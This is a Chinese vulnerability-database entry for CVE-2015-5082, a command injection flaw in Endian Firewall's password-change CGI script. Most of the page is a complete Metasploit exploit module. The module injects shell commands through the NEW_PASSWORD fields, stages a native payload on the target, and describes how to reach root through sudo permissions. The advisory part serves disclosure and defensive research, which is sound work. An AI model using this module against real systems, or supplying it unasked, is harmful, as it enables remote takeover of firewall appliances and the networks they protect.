Endian Firewall 操作系统命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1122842 漏洞类型 操作系统命令注入
发布时间 2015-06-29 更新时间 2015-09-29
CVE编号 CVE-2015-5082 CNNVD-ID CNNVD-201509-574
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/37428
https://www.securityfocus.com/bid/76865
https://cxsecurity.com/issue/WLB-2015090046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201509-574
|漏洞详情
EndianFirewall是意大利Endian公司的一套基于RedHatEnterpriseLinux操作系统的统一风险管理工具。该工具提供HTTP/FTP病毒防护、POP3/SMTP病毒防护、SSL/TLS虚拟专用网等功能。EndianFirewall3.0之前版本中存在安全漏洞,该漏洞源于cgi-bin/chpasswd.cgi文件没有充分过滤‘NEW_PASSWORD_1’和‘NEW_PASSWORD_2’参数。远程攻击者可借助shell元字符利用该漏洞执行任意命令。
|漏洞EXP
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Endian Firewall < 3.0.0 Proxy Password Change Command Injection',
      'Description' => %q{
        This module exploits an OS command injection vulnerability in a 
        web-accessible CGI script used to change passwords for locally-defined
        proxy user accounts. Valid credentials for such an account are 
        required.
        Command execution will be in the context of the "nobody" account, but 
        on versions of EFW I tested, this account had broad sudo permissions, 
        including to run the script /usr/local/bin/chrootpasswd as root. This 
        script changes the password for the Linux root account on the system 
        to the value specified by console input once it is executed.
        The password for the proxy user account specified will *not* be 
        changed by the use of this module, as long as the target system is 
        vulnerable to the exploit.
        Very early versions of Endian Firewall (e.g. 1.1 RC5) require
        HTTP basic auth credentials as well to exploit this vulnerability.
        Use the standard USERNAME and PASSWORD advanced options to specify
        these values if required.
        Versions >= 3.0.0 still contain the vulnerable code, but it appears to 
        never be executed due to a bug in the vulnerable CGI script which also
        prevents normal use.
        Tested successfully against the following versions of EFW Community:
        1.1 RC5, 2.0, 2.1, 2.5.1, 2.5.2.
	Used Apache mod_cgi Bash Environment Variable Code Injection 
	and Novell ZENworks Configuration Management Remote Execution
	modules	as templates.
      },
      'Author' => [
	'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
      ],
      'References' => [
#        ['CVE', ''],
#        ['OSVDB', ''],
#        ['EDB', ''],
        ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
      ],
      'Privileged'  => false,
      'Platform'    => %w{ linux },
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d",
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 10443
        },
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jun 28 2015',
      'License' => MSF_LICENSE
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', 
        '/cgi-bin/chpasswd.cgi']),
      OptString.new('EFW_USERNAME', [true, 
        'Valid proxy account username for the target system']),
      OptString.new('EFW_PASSWORD', [true, 
        'Valid password for the proxy user account']),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]),
      OptString.new('RPATH', [true, 
        'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10])
     ], self.class)
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, 
        "#{peer} - Failed to store payload inside executable, " + 
        "please select a native payload")
    end

    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], 
      :nodelete => true)
  end

  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

    req(cmd)
  end

  def req(cmd)
    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"

    boundary = "----#{rand_text_alpha(34)}"
    data = "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
    data << "change\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
    data << "#{datastore['EFW_USERNAME']}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
    data << "#{datastore['EFW_PASSWORD']}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
    data << "#{sploit}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
    data << "#{sploit}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
    data << "  Change password\r\n"
    data << "--#{boundary}--\r\n"

    refererUrl = 
      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + 
      "#{datastore['TARGETURI']}"

    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => datastore['TARGETURI'],
	'ctype' => "multipart/form-data; boundary=#{boundary}",
        'headers' => {
          'Referer' => refererUrl
        },
        'data' => data
      }, datastore['TIMEOUT'])

  end

end
|受影响的产品
Endian Firewall 2.5.1 Endian Firewall 2.1.2
|参考资料

来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/37426/
来源:packetstormsecurity.com
链接:http://packetstormsecurity.com/files/133469/Endian-Firewall-Proxy-Password-Change-Command-Injection.html
来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/37428/
来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/38096/